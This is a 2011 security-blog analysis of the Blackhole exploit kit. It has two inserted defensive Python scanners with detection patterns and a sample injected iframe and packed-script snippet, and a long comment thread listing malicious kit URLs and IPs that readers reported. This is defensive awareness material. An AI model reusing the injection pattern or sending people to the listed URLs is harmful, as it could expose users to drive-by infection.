Friday, February 11, 2011

Blackhole exploits kit attack growing

Recently, we have seen an increase in Blackhole exploit kit attacks. Blackhole is yet another web exploit kit developed by Russian hackers. According to one forum, the author indicates that the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. It is a very powerful kit with a number of recent exploits, including Java and Adobe PDF exploits. The attacker has continually improved the kit with more obfuscation and crypto algorithms to avoid detection by AV vendors. One line from the kit's description says it all: “Exploits crypt on special algorithms that make it impossible to code analysis and detection of anti-virus as well as services,Tipo wepawet and other counterparts ...”. Analysis of this malicious toolkit showed that the URL patterns remain the same for most of the malicious domains hosting the Blackhole exploit kit. A Google search for the URL patterns returns thousands of results for such domains, and Google generally flags them as malicious. Here is a screenshot of the Google search:

The exploit kit sends heavily obfuscated JavaScript code along with Java applet code, which downloads a malicious JAR file to the system. Here is what the code looks like:

The JavaScript above is formatted for better viewing. It is heavily obfuscated to avoid antivirus detection. If we decode the content, we see that the kit is targeting a recent vulnerability in Java. The VirusTotal result for the above “.jar” file is very poor, with only 2 antivirus engines triggering on it. Here is the decoded part of the script:

The decoded JavaScript above targets CVE-2009-1671. It downloads a malicious binary called “info.exe” from the server and executes it on the system. The VirusTotal result for this file remains poor at only 47%. There is also another iframe attack in the decoded JavaScript code.

The above code appends a malicious iframe to the body of the webpage, pointing to another malicious URL. That URL in turn contains yet another malicious URL in ASX file format. This is done intentionally to avoid a user prompt. Here is the source:

This URL then sends more obfuscated JavaScript code, exactly like the second image in this post. Once decoded, it shows JavaScript code that targets CVE-2010-1885. Here is the decoded script:

We have seen many similar web exploit kits in the past, and attackers keep coming up with new ones like Blackhole with more features and more reliable, undetectable exploits. We are also seeing a large number of malicious domains hosting the Blackhole exploit kit. The detection ratio is generally very poor for the malicious binaries contained in the kits. Even though the price of this exploit kit is high, it remains a sought-after commodity.
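The opening paragraph notes that the landing-page URL patterns stay the same across the domains hosting the kit, and the reader reports further down (AVG and Norton pop-ups) quote URLs of the shape `<script>.php?<param>=<16 hex characters>` on throwaway sub-domains such as `.co.cc` and `.cz.cc`. The following is an added example, not code from the post or from Zscaler: a small proxy-log triage script that flags that URL shape, the free sub-domain suffixes seen in the comments, and the `info.exe` second-stage name from the post, then lists the referring sites, which are the candidate compromised pages carrying the injected iframe. The log format and all log lines are constructed for the example; the heuristics are deliberately narrow and will need tuning for real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Landing-page URL shape quoted in the reader reports: a short PHP script name
# followed by one query parameter whose value is 16 hex characters,
# e.g. index.php?tp=7903472c292fded4 or main.php?page=64a30cd969b37792.
LANDING_RE = re.compile(r"^/(?:index|main|forum)\.php$")
HEX16_RE = re.compile(r"^[0-9a-fA-F]{16}$")

# Free sub-domain suffixes that recur in the reported URLs. This is a weak
# signal on its own (plenty of legitimate sites use them), so it is reported
# as one reason among several rather than as a verdict.
SUSPECT_SUFFIXES = (".co.cc", ".cz.cc", ".cx.cc", ".ce.ms")


def score_url(url):
    """Return the list of heuristic reasons a URL looks like a kit landing page or payload."""
    reasons = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    if LANDING_RE.match(parts.path):
        params = parse_qs(parts.query)
        if len(params) == 1:
            (values,) = params.values()
            if len(values) == 1 and HEX16_RE.match(values[0]):
                reasons.append("landing-page shape: single 16-hex query value")
    host = parts.hostname or ""
    if host.endswith(SUSPECT_SUFFIXES):
        reasons.append("free sub-domain TLD")
    if parts.path.endswith("/info.exe"):
        reasons.append("second-stage payload name from the post")
    return reasons


# Constructed proxy log in a simplified "client method url referer" format
# ("-" means no Referer header). Not real traffic.
SAMPLE_LOG = """\
10.0.0.12 GET http://hubpages.com/forum/topic/13065?page=2 -
10.0.0.12 GET http://mld.co.cc/index.php?tp=7903472c292fded4 http://hubpages.com/forum/topic/13065?page=2
10.0.0.12 GET http://mld.co.cc/info.exe http://mld.co.cc/index.php?tp=7903472c292fded4
10.0.0.33 GET http://www.example.org/index.php?id=42 -
10.0.0.33 GET http://buop5.cz.cc/forum.php?tp=76d7830c46e88231 http://www.example.org/
"""


def scan_log(text):
    """Return one alert dict per log line that scores at least one reason."""
    alerts = []
    for line in text.splitlines():
        client, _method, url, referer = line.split()
        reasons = score_url(url)
        if reasons:
            alerts.append({"client": client, "url": url, "referer": referer, "reasons": reasons})
    return alerts


def referring_sites(alerts):
    """Hosts that referred a client to a flagged URL and are not flagged themselves.

    These are the pages most likely to carry the injected iframe, which is what a
    site owner needs to clean; the kit domain itself is only the destination.
    """
    hosts = set()
    for alert in alerts:
        if alert["referer"] == "-" or score_url(alert["referer"]):
            continue
        hosts.add(urlsplit(alert["referer"]).hostname)
    return sorted(hosts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(alert["client"], alert["url"], "->", "; ".join(alert["reasons"]))
    print("candidate compromised referrers:", referring_sites(found))
```

Run against the constructed log, the three kit-domain requests are flagged and the two referring sites (`hubpages.com`, `www.example.org`) are reported; the `index.php?id=42` request on a normal host is not, because the value is not 16 hex characters. A single 16-hex parameter is not unique to this kit, so treat a hit as a pivot for investigation (pull the referring page and inspect its HTML) rather than as proof of compromise.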

Umesh

114 comments:

Anonymous said...

I was using chrome, viewing a popular UK website about celebrity news and the blackhole kit exploit was blocked by AVG. What damage could be done by this threat and why is it on a popular website or in chrome?

Umesh Wanve said...

That's good that threat is blocked by your Antivirus. The damage can be like compromising your system, stealing your confidential data etc. If you remember the website address, please email to me uwanve@zscaler.com for further analysis.

Adam said...

I got a pop-up while using Chrome also, but this was when I was trying to access my emails on Hotmail; the webpage didn't even connect, the pop-up appeared and said the page couldn't be found.

Anonymous said...

Hi, same Anonymous as before. I just got the AVG Blackhole exploit kit warning from using Hotmail, so I am worried that I may well be infected from my own PC, not an outside website. Do you think Chrome could be the issue? Internet Explorer can be slow, but if it's safer... I'd pick the tortoise over the hare every time.

Anonymous said...

Different person. I use IE and just received an "AVG Blocked" message while using Hotmail. Never seen this before, and I was receiving a text-to-email from someone's cellphone.

Anonymous said...

This morning I got a pop-up from AVG saying it blocked Blackhole Exploit Kit. It happened right after I logged into Hotmail as well. I ran AVG and got no other signs of infection. I also ran Malwarebytes and it came up negative.

Umesh Wanve said...

@ all Anonymous
If AVG triggered and blocked it, then you are safe. But I am curious that all of you are getting the pop-up while on Hotmail. In that case, please email the URL, text or any other page details of the website where AVG triggered to uwanve@zscaler.com

Anonymous said...

Also got a pop-up from AVG when on Hotmail this morning.. but it came up only after opening a message from one of those companies that offers coupons for a deal of the day.

Anonymous said...

I've had a message that AVG has blocked Exploit Blackhole Exploit Kit (1883) happen whilst on Hotmail this Sunday and last Sunday. To be honest, I am a bit concerned, as my Hotmail account was recently hacked and proceeded to spam all my friends and then delete my contacts list.

Anonymous said...

I got it while playing "Snowball Fight" on Facebook... never seen it before today.... AVG 2011 blocked it.

Anonymous said...

My first post here: It's happened twice on my computer. The first time was two days ago and then again today. Both times I was in Hotmail (seems to be a theme).
AVG blocked it and locked up my browser (IE). Full scans found nothing. The first time I clicked on "further info about this threat" in the AVG warning and tried searching their library with their suggestions in the warning but found nothing. Next time I'll save the long url they suggested in their warning and post here. BTW, my original warnings called it "Type 1384" but later it seemed to be labeled "Typw 1889"....I think...

Umesh Wanve said...

@ All.

Thanks for passing the emails. Most of you have been protected by AVG, and the mentioned URLs are hosting Blackhole exploits.

Anonymous said...

I am new to this stuff, so can you please help me and tell me what tool/technique you used to deobfuscate this JavaScript?

Umesh Wanve said...

@ Anonymous

I mostly use Malzilla, a good tool to decode the JavaScript. Sometimes I do manual analysis as well. We do have some internal frameworks for de-obfuscating the content. Use Malzilla for better understanding.

Anonymous said...

from a new "anonymous":

I keep having this Blackhole Exploit warning coming up from AVG (blocked by AVG) on this URL:

http://hubpages.com/forum/topic/13065?page=2

The AVG warning also contains the following info:

"URL: mld.co.cc/index.php?tp=7903472c292fded4

Name: Blackhole Exploit Kit (type 1889)"

kelliemurray said...

I just got the same blocked threat from AVG while on the homepage of facebook.

Anonymous said...

Can it be found by McAfee?

Anonymous said...

Original Anonymous back,

I uninstalled Chrome after my last post and NO Blackhole exploit warnings from AVG since. I tried IE9 yesterday, WHICH SUCKS, so have moved to Mozilla Firefox and like it. I think AVG and Chrome came into conflict somehow, but I believe this is a Chrome communication error that AVG thinks is malicious... Just an unfounded suggestion.

Umesh Wanve said...

@ Anonymous

I am not sure about McAfee.

Umesh Wanve said...

@ Original Anonymous
It may not be an issue with Chrome and AVG; rather, you must have come across an infected site and AVG triggered on it. Firefox and Chrome can sometimes warn you about malicious sites while browsing.

Anonymous said...

I got the same message whilst visiting a cricket stream at crictime.com

Anonymous said...

From another anonymous

Here's another link that AVG will block with the warning of a Blackhole Exploit Kit.

http://sephoracoupons.co.cc/c308

Anonymous said...

129.121.32.26/home/index.php

This was while I went to a website called joecanuck and entered their forums.

AVG blocked it, and it was called Exploit Blackhole Exploit Kit (type 1889).

Only site I have seen it on from my usual web browsing.

Steve Kennedy said...

My AVG 2011 just blocked "Exploit Blackhole Exploit Kit" (plus a type number that I forget) at this site:

www.worldfest.org

This is the website for the upcoming Houston International Film Festival, which should get lots of visits.

Steve Kennedy
Deer Park, TX

Anonymous said...

Hi, I use IE7, gmail, and AVG (for your FYI and stats).

Clicked link within email going to WebMD

URL visited: http://forums.webmd.com/3/neurology-general-neurology-questions-and-support/forum/89?@guest@
Exploit error occurred right after an ad loaded for "Culturelle" on left side-bar.

I had to close top warning box in order to maximize the page; I didn't copy the first warning which sat atop the 2nd warning.

2nd warning was---
AVG Surf-Shield message directed to "follow one of the suggestions below to continue:
URL: roge2.cx.cc/index.php?tp=120d964da3a16988
Name: Blackhole Exploit Kit (type 1384)

Have bmp screenshot if you want it.

Tried mailing customer service for WebMD - mail returned.

Anonymous said...

I think you guys shouldn't get on Hotmail; it seems like nothing but trouble. Get on Yahoo instead.

Umesh Wanve said...

@ Steve Kennedy

Thanks for passing the link. Worldfest was infected with malicious content. I posted a blog about it. Worldfest removed the bad code after the blog.

Umesh Wanve said...

@ Anonymous
The site looks exactly like a Blackhole exploit site: roge2.cx.cc/index.php?tp=120d964da3a16988

AVG blocked it for you.

Anonymous said...

Hi,
Just call me AnonymousD.
I just got the same AVG threat blocked message from a site our company previously designed; the infected file was global.js. The code I pulled out of the JS was:

[couldn't post, too long]

Well, it probably won't let me post it all, but hopefully the mod can see it.
It was infected at 8:20am on Apr 8th, 2011.

TY and GL
-D

Zadora said...

Send me an email Umesh, and I can send you the entire js file, if you're interested.

-D

cyber said...

Hi..

I wasn't using Chrome, I was using Firefox..

And it was on a famous website..: deviantART (dA).. So I don't understand... ... But yesterday, while I was doing a search on Google, I clicked on lots of unknown websites... And that search was the last thing I did before I turned off the computer.. And today, 10 minutes after having my computer on, this threat appears.. I don't know if it's related somehow.. I don't understand anything about viruses..

The specific URL was..: http://www.deviantart.com/#/d3dmt2v

Anonymous said...

Using Firefox and doing a Google search, then clicking on the websites in my search, I've come across 4 Blackhole alerts :/
Managed to get the URL of one of them:
http://coralreff.cz.cc/QQkFBwQEDAUHDQMHEkcJBQcEBgIGBQAEBA==

Is there any way to fix this or use an antivirus so it doesn't happen again?

Thanks
-A

Anonymous said...

Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,Risk Name,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
4/13/2011 6:59 AM,High,An intrusion attempt by 0s1.cz.cc was blocked.,Blocked,No Action Required,Web Attack: Blackhole Toolkit Website,"0s1.cz.cc.This was blocked by norton after looking at article on yahoo.

Anonymous said...

Hey,

Was using Hotmail once and got the message; the other time was when looking up images (I'm a gfx artist) and doing work on forums for people. AVG blocked the Blackhole hit while on this image on ImageShack, I believe. I looked and it said it was located in my Program Files (Internet Explorer).
I'm currently using IE9, so this isn't a good sign.

susieq said...

I got the Exploit Blackhole Exploit Kit pop-up while on Facebook, and I use Firefox 4.0.

susieq said...

I got the Exploit Blackhole Exploit Kit pop-up from AVG while on Facebook and using Firefox 4.0.

Movie Torrents said...

Why do all these comments only have detection by AVG?

Umesh Wanve said...

@ Movie Torrents

Most of them are using the free AVG version, and it is able to block a large number of Blackhole exploits.

Umesh Wanve said...

@ susieq

Please be sure which pages were open when AVG popped up, and email me any URLs you found suspicious. You will find my email in the comments.

Anonymous said...

Getting blackhole exploit kit attack (2008) from:

mongth.com/main.php?a=3b627d63efed55ba

cablab7 said...

URL: aaarrr22.cz.cc/index.php?tp=592e406c7cea87e8
Name: Blackhole Exploit Kit (type 2008)

steve K said...

I am using IE 8 and got the warning Blackhole Exploit Kit
at MSN/Fox Sports. Apparently
AVG blocked it.
Steve

Anonymous said...

Since yesterday, that is April 24th, I'm getting LOTS of Blackhole kit exploits, type 2005, 2008 etc. I am getting such threats while reading Yahoo news and searching with Google; I see incomplete webpages without proper page layout, just some scattered text. I'm using IE9 and Firefox 4. Although AVG is able to protect, since yesterday, April 24th or 23rd, I have seen an unusual number of attacks. It feels odd why all of a sudden I'm getting such virus threats. Sometimes I need to reload a webpage several times to see it, and sometimes it keeps showing Connecting........ Why don't the webpages load up at once? Why do they take several reloads before being properly loaded? Why does it keep saying Connecting, Connecting and then "The connection has timed out"?? I got this error several times.

Anonymous said...

Yes, I'm getting a lot of threats whether I use Firefox 4 or IE9. Especially Google search is showing lots of Blackhole exploits, like this one.
http://www.google.com.pk/search?q=chinese+chana+pickup&hl=en&client=firefox-a&hs=OYL&rls=org.mozilla:en-US:official&prmd=ivns&source=lnms&tbm=isch&ei=eWW1TZrnOofKrAeN7tjIDQ&sa=X&oi=mode_link&ct=mode&cd=2&ved=0CA4Q_AUoAQ&biw=1100&bih=625

Umesh Wanve said...

@ Latest Anonymous

Can you remember the exact URLs visited? Can you take some screenshots of the webpage and the AVG pop-up? If possible, please collect all possible data and email it to me for further analysis. I can be reached at uwanve@zscaler.com

Umesh Wanve said...

@ steve K

Can you email me the exact URL and possibly screenshot?

xen said...

Hey using FF 4.0. and got "Blackhole kit Exploit (type 2005)" at www.darklyrics.com.

I use this site all the time and I have not gotten any warnings from AVG there(I'm using AVG).

I haven't gotten it anywhere else just here so far.

Anonymous said...

Hi, I had AVG popping up every 10 or so seconds just now saying this:

Threat blocked from: citymartonline - Threat type: Exploit Blackhole Exploit Kit.

I've never been on that site and I didn't find much when I Googled it either. Help pls? :)

Gillsing said...

Today http://steakfacegames.com/ appears to be afflicted with some code that wants to download a file and open a pdf-document. Another visitor said that their AVG had called it a blackhole exploit. The main page has also been reported, but that warning doesn't seem to work when a game is linked directly, though that's when I encountered the problems.

D. Doe said...

Norton popped up with a warning that it had detected an intrusion attempt from headoo.cz.cc193.105.154.235,80
and blocked it.

Anonymous said...

Norton just detected an intrusion attempt on my PC 15 minutes ago.

I use Mozilla and Norton's report says:

Web Attack: Blackhole Toolkit Website.

Attacking Computer
buop5.cz.cc (194.247.183.130.80).

Attacker URL
buop5.cz.cc/forum.php?tp=76d7830c46e88231.

Anonymous said...

I am using Firefox 4.0.1. Twice now AVG has blocked access on msnbc's home page. The first time a couple of weeks ago, and just now, May 4, 8:20pm cst.

merlin96 said...

I got blocked by Norton from the Malicious Toolkit 9. The address both times in a matter of minutes that it happened was 193.105.154.236. I hope because I was blocked that my computer is o.k. This also happened to me this morning.

merlin96 said...

I also wanted to say that two earlier attempts were made from the same address - 193.105.154.236 -- earlier this morning. I wanted to check the address to make sure it was the same before posting. In both cases with these blocked attempts of the "malicious toolkit website 9" virus, they happened 4 minutes apart. It makes me nervous that there is some vulnerability in my computer - something left open in my firewall - although thankfully my antivirus software caught it. I am doing a full scan now but so far, it has found nothing but the usual cookies.

Ann said...

Use Firefox and AVG Free. Got blocked on site http://www.helwigcarbon.com/ the Spanish version.
URL: peru-pcb.com/jquery.js
Name: Blackhole Exploit Kit (tpe 2014)

Anonymous said...

Hi, I am getting continuous Blackhole exploit kits which were blocked by AVG, for different websites. AVG says the URL is www.google-analytics.com/ga.js
Can you tell me why this is happening, as it is very frequent?

Rob said...

As others have mentioned, I just got it on Chrome while on my Hotmail. AVG picked it up and blocked it.

merlin96 said...

Here I am again - this time received a block by Norton from address 79.170.40.36 -- Malicious Toolkit Iframe Injection. I was on jewelrymaking.allinfoabout. Don't know why I seem to keep getting attacked on all these different sites, although thankfully my AV software has picked it up to date. (BTW I use IE7 and was using Google browser). Could there nonetheless be something hidden in my hard drive that a scan hasn't picked up - can anyone answer this question?

Anonymous said...

I've had this twice in two days - one is a site I know (belongs to a friend of mine) & the other was following a Google image search for a wardrobe! AVG 2011 blocked it both times.

adin said...

Any recommended tools/cleanup procedures for sites that have had the iframe injected? Using server-side tools like ClamAV and rkhunter we haven't been able to find anything (after a few users reported Blackhole alerts).

What attack vector is this exploit using on servers?

Umesh Wanve said...

@ adin

Generally, don't rely on antivirus. You will have to check the source pages for possible bad code manually. Attackers can inject malicious code by taking advantage of known/unknown vulnerabilities, or they can modify pages by stealing FTP passwords.
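The reply above recommends checking page source by hand, and the post itself describes the injection as an iframe appended to the page body plus a heavily obfuscated script. As an added example that is not code from the post or from Zscaler, here is a first-pass triage scanner for a site's HTML files using only the Python standard library: it reports iframes that are hidden by CSS or sized to a pixel or less, and script blocks carrying common packing markers (`eval`, `unescape`, `fromCharCode`, `document.write(unescape`) or dense hex escapes. The sample page, the site host name and the kit host name are all constructed for the example; a hit is something to read by hand, not an automatic verdict.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Substrings that packed loaders lean on; legitimate minified code can contain
# them too, so they raise a finding for manual review rather than a verdict.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(unescape")
HEX_ESCAPE_RE = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2})")


class InjectionScanner(HTMLParser):
    """Collect (line, kind, detail, reasons) tuples for suspicious iframes and scripts."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._in_script = False
        self._script_line = None
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        line, _offset = self.getpos()
        attrs = dict(attrs)
        if tag == "iframe":
            self._check_iframe(attrs, line)
        elif tag == "script":
            self._in_script = True
            self._script_line = line
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._check_script("".join(self._script_buf), self._script_line)
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def _check_iframe(self, attrs, line):
        reasons = []
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        for dim in ("width", "height"):
            value = (attrs.get(dim) or "").strip().rstrip("px")
            if value.isdigit() and int(value) <= 1:
                reasons.append("%s=%s" % (dim, value))
        if reasons:
            src_host = urlsplit(attrs.get("src") or "").hostname or "(no src)"
            self.findings.append((line, "iframe", src_host, reasons))

    def _check_script(self, body, line):
        reasons = [marker for marker in OBFUSCATION_MARKERS if marker in body]
        if len(HEX_ESCAPE_RE.findall(body)) > 20:
            reasons.append("dense hex escapes")
        if reasons:
            self.findings.append((line, "script", body.strip()[:40], reasons))


def scan_html(html, site_host):
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_tree(root, site_host, extensions=(".html", ".htm", ".php")):
    """Walk a document root and return {path: findings} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings = scan_html(fh.read(), site_host)
                if findings:
                    report[path] = findings
    return report


# Constructed page: one ordinary video embed and one injected, hidden iframe
# to a placeholder kit host, plus a packed script in the head.
SAMPLE_PAGE = """<html><head><title>Clean-looking page</title>
<script type="text/javascript">
var a=!1;if(!document.cookie.match("seen")){document.write(unescape("%3Cifr%61me%20src%3D..."));}
</script>
</head><body>
<p>Normal content</p>
<iframe src="http://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://kit.example.invalid/index.php?tp=0123456789abcdef" width="1" height="1" style="visibility: hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for line, kind, detail, reasons in scan_html(SAMPLE_PAGE, "www.example-site.invalid"):
        print("line %d %s %s: %s" % (line, kind, detail, ", ".join(reasons)))
```

On the constructed page the scanner reports the script on line 2 (`unescape(` and `document.write(unescape`) and the 1x1 hidden iframe on line 8 with its destination host, while the ordinary embed passes. Run `scan_tree` over a local copy of the document root; because the injected code can live in PHP templates or plugin JavaScript rather than in static HTML (as the vBulletin/WordPress reports further down describe), compare the live rendered page against the files on disk as well.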

[ U j ] said...

Hey, I got the same msg on my AVG 2011 and it blocked around 4-5 Blackhole Exploit Kit (type 2022). But unfortunately yesterday I lost my Gmail, Hotmail, AlertPay accounts. But thanks to the recovery option available there, I recovered everything in 10 minutes. But the hacker did put his email in the email forwarding option. So this threat/virus is very dangerous in stealing your information.

Did anyone else notice why only AVG members are getting this? I scanned my PC with AVG, no virus found.. I uninstalled it completely and installed Avira and it caught 48 viruses on my PC. I think among paid products, Kaspersky Internet Security is a better option over AVG Internet Security. And among freebies, I think Avira did the best job.

merlin96 said...

In response to the last post and the question - "why do only AVG members get this" - I'm not very tech savvy, but if I'm understanding your question correctly, then let me answer that to say they don't. I use Norton AV software and have also gotten a number of blocked attempts. (See my several posts above.) I'm wondering if it has to do with the browser I'm using and thus, wondering what browser others are using. I'm using the older IE7 and recently got an email from PayPal that I should update because there have been a lot of security issues with the browser I'm using. However, when I updated to IE9, I hated it so much I immediately uninstalled it and am now trying to decide what to do next - maybe Mozilla Firefox? Anyway, it's not just AVG users who are getting these messages and attempted attacks.

Richard Harlos said...

I just sent you an email with the URL where I got the AVG "Threat blocked" message for Blackhole. That URL, if anyone else is interested, is http://freewowguide.org/wow-death-knight-guide-talents-specs-and-rotations-for-patch-4-0-1/ and just yesterday I visited and got no AVG block.

I use Chrome v12.0.742.100, run on Win7 64bit, and only yesterday applied all of the several latest Windows Updates as well as the latest Adobe Reader (not sure of version) and Java updates (v26 if memory serves).

Thank you for your informative posts & helpful attitude here :)

Shiny said...

Shiny,
As with loads of others, I rarely use my internet, but when I get the Blackhole toolkit blocked by Norton... you guessed it, HOTMAIL. The message I receive is:
Backhole Toolkit Wbsite.
hercules.co.be (193.105.154.239, 80)
hercules.co.be/index.php?tp=39f5373c9a2e07df
source address 193.105.154.239
this is the source address not the destination address so it's not something on my pc as mine destination address is not the source address.
Note reads, network traffic FROM hercules.co.be matches the signature of a known attack. The attack was a result from \device\harddiskvolume1\program files\internet explorer\iexplore.exe
I use very little on the internet as keep getting this but only on Hotmail.

Rob Marshall said...

Here is a reputable French website which AVG is also blocking due to Blackhole kit detection (2014): http://www.mc-conseil.fr/

Should I try to let them know their site is compromised?

Rob Marshall said...

Here is a reputable French website which is also being blocked by AVG due to BlackHole Exploit Kit (2014) detection.
http://www.mc-conseil.fr/
Should I try to let them know their site is compromised?

Umesh Wanve said...

@ Rob Marshall

It is also blocked by Google Safe Browsing. Yes, you can email them about the infection.

Anonymous said...

....I was attacked (but AVG saved me) by a misspelling of the site memegenerator.net:

The exploit site was memegenrator.net....

Anonymous said...

AVG just blocked a Blackhole exploit Kit at the URL:

www.slavemissi.com

Anonymous said...

My site about cheap web hosting which can be found at http://best-inexpensive-web-hosting.com was also attacked by this blackhole. My web host is currently restoring the backup of one week ago. Hope it helps!

HN said...

I get an avg block at flying-web.net

theturtleblues said...

Hey need some advice. Got hit with a trojan virus called Exploit Blackhole Exploit Kit. I tried following step-by-step removals online but ended up not even being able to start windows. I formatted the drive, but it's still not gone. I downloaded AVG and Malwarebytes which seems to be stopping any actions the virus is trying to take. Malwarebytes identified it and said it removed it successfully. Windows wouldn't start again upon reboot, but started after shutting down one more time. Upon startup, all my antivirus software was gone and I had to reinstall. Now none of the programs are identifying that there even is a trojan, but Malwarebytes is still continuously blocking malicious sites that are trying to open.

I am too inexperienced to really know what I'm doing if I try to remove it manually. Any recommendations on how to remedy this?

Anonymous said...

When you google "Charice shuts down Oprah with powerful performances" and visit the URL of the first website at the top of the search results an AVG window popped up.

I was on Firefox 7.0.1 with AVG free (version 2012.0.1831) which blocked the Blackhole Exploit Kit (type 1889)
with File name: edthosting.ce.ms/main.php?page=64a30cd969b37792

Clicking on "More Info" link provided by AVG comes up with nothing more about this threat.

Ricchard Grant said...

Hello, can you help me please. We run a business via www.k9help.net which is now being blocked by the "malicious toolkit website 9". I have absolutely no idea how to remove this, who to contact to have the script removed, in fact no idea of what to do next. Could you please give me some help and advice? Our business is being affected, and I'm not sure who else to ask.
Thank you, Richard Grant

Anonymous said...

I've been getting hit with this Exploit Blackhole at least 6 times a day....

ArticlesBullet said...

Thanks to the antivirus, hackers can be blocked now..

Anonymous said...

I was attempting to open a video required by my jazz history class when AVG alerted me of a Blackhole Exploit kit. I have read many of these comments and no one else has appeared to have been made aware of this threat as a result of a video. Could this mean that the virus has been developed to affect a larger variety of files since its conception? The file in question was a .php if that helps

Anonymous said...

I just got this while gaming on Facebook. The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: h4r29h.com/ai8r643.php
Name: Blackhole Exploit Kit (type 1889)

Anonymous said...

Hi, I was recently visiting a website called PSPISO and it came up with the Blackhole exploit threat. Can I still visit this website? Or will I get the virus?

nev said...

I tried to visit www.sulit.com.ph, a popular eBay-like website here in the Philippines. Chrome suggested not to continue because it found the Russian Blackhole exploit kit:

aswaz.ddns.name

Umesh Wanve said...

@ Anonymous

If you got the alert, report this to the site owner. And don't visit that site unless they remove the bad code.

Umesh Wanve said...

@ nev

Thanks for the comment. But the site opens in Chrome for me. I didn't find any bad code on that site. If you can recheck and post back, that would be good.

Anonymous said...

I also got the threat blocked by AVG. The URL I usually go to, which is saved in my Firefox, is im.chikka.cm.. The threat also says that the infected file is my firefox.exe? How is that possible if the threat does not always appear?

eric said...

im.chikka.com is also infected by the Blackhole exploit kit but was blocked by my AVG, though not always. I got infected and had to reformat my drive C. I hope it will be the last time I re-format.

Anonymous said...

Using firefox and Windows XP

I am getting "type 1889"; however, I think this is just not a case of infected sites - there is some sort of browser hijack involved. Quite a few times I have pressed the back or forward buttons on Firefox and have then been hijacked to a site I have never seen before. Same for doing a Google search: I click on a "reputable link" to Wikipedia or what have you and get redirected.
However, nothing is showing up with AVG or Spybot S&D.

Anonymous said...

AVG blocked this Blk.Hole bullsh** for me while visiting my bookmark on Firefox to a very useful site named allofcraigs.com. I wonder if it came from a listing or.. the site itself?

Anonymous said...

I'm using AVG 2011 and Comodo Firewall. AVG popped up and said it caught Blackhole but there was no option to remove it. Then a thing popped up asking for administrative access, but if I didn't accept it wouldn't go away; then I did accept, and antivirus and firewall shut down. I shut down and did a system restore, then scanned my system: AVG found like 10 viruses, 1/2 of which it can't remove, so I moved them to the vault; malware found 6 viruses and Windows Defender found 4. I was using a program, Paltalk. I think it may be a direct thing from Paltalk. Any ideas how to prevent this? It happened 3 times already; I thought the antivirus would help, no such luck.

Anonymous said...

I think it has been well-established that there is a problem - what is lacking in this thread is explicit information and methodology to resolve the problem. I'm no expert, however these attacks are so much of a drain that I'm thinking of becoming one. Here's my case so far ...

GIVEN:
index.php with no off-site includes
all files scan clean of nasty code
AVG Free scans clean on entire local PC

SYMPTOM: Exploit Blackhole

OBSERVATION: load page, watch msgs on status line/area, page APPEARS TO COMPLETELY LOAD, then more msgs appear reflecting access to unknown 3rd-party site. iFrame "clue" is near lower/left corner of page. View Page Source shows nothing, however right click on the "clue" and Inspect Element shows iFrame with the rogue link.

THE WEIRD BITS:
1) scan with Google Safe Browsing Diagnostic says the page is clean

2) quick check using FTP to view and download the page shows no defect - there is no iFrame/JS code, and the file has not been touched (and I mean that in the technical sense).

THEORY #1:
Clever bugger is hiding somewhere on the client side, compromising the browser(s) themselves. Firefox 5.0, Chrome 15.0.874.121, and for good measure IE 6.0.2900 which I am loathe to update.

Is there code (java?) that all three might use or call in performing their tasks?

THEORY #2:
Web page is f'kaked and I can't see it - furtive code, hidden characters, no idea really. Would need a simple reliable tool to scan the entire site - live and/or local.
POSSIBLE SOLUTION:
This is where Zscaler and the rest of you chime in. We don't need many more testimonials, we need science of a computer type.

Anonymous said...

http://karkkilanseurakunta.fi

This domain is currently under the BlackHole Exploit.

Reported by Symantec Endpoint Protection when I was being cheated by a spam containing a link to this domain.

Remilee said...

I got the same thing on AVG when I logged in to Chikka Messenger. What could it do to my computer? Please help!

MARIANNA said...

A week ago I downloaded Paltalk. I have used it twice. Both times Norton notified me that it blocked a Blackhole attack from Paltalk Messenger. Am I in danger? Is Paltalk safe? I have taken a screenshot of the Norton details about the attack and I was going to send it to you but I don't know how. Please let me know if you need it. Can you please give me as much information as possible as to whether I am safe using Paltalk and what can I do to prevent getting intruded from the virus. Thank you very much, Marianna

Anonymous said...

Using IE9, accessing site www.slipstreamtv.com, useful for sport viewing, full of pop-ups and adverts and must have clicked on one. Norton AV message "an intrusion attempt by 86.63.168.105 was blocked"; more detail advised that it was a "Web Attack: Blackhole Exploit Kit Website 11". IP address traces to Latvia.

Anonymous said...

Is it safe to delete the info.exe files?

Anonymous said...

http://www.atimes.com/

Asia Times triggered it for me.

Enlightenment said...

I am a web developer and my site has come under attack. I have repeatedly removed the file(s), and it will go for weeks/months without any infections, then all of a sudden, like clockwork, the virus will pop up again.

How can you decode the obfuscated code?

I do have a copy of the code, if you want to see it.

How can I scan a Linux machine for the malicious code?

Julien Sobrier said...

